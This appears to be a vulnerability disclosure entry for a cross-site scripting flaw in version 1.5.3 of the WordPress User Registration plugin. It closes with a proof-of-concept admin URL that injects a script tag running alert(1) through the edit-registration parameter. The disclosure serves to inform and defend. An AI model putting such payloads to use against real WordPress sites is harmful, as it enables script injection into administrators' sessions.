WordPress User Registration plugin version 1.5.3 suffers from a cross site scripting vulnerability.
3309833067b6b1a7338dcfae2aaeec5cc34d8bd17c8a20fdb77f6ebcc85a9ba8
# Exploit Title: Wordpress Plugin User Registration 1.5.3 - Cross Site Scripting
# Discovery by: Mr Winst0n
# Discovery Date: 2019-01-09
# Vendor Homepage: https://wpeverest.com/
# Software Link : https://wordpress.org/plugins/user-registration/
# Tested Version: 1.5.3
# Tested on: Kali linux, Windows 8.1 / Wordpress 4.9.8
# The User Registration plugin for WordPress is prone to a cross-site-scripting vulnerability because
# it fails to properly sanitize user-supplied input.
# User Registration 1.5.3 is vulnerable; other versions may also be affected.
# PoC:
#
# http://localhost/wordpress/wp-admin/admin.php?page=add-new-registration&edit-registration=220%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E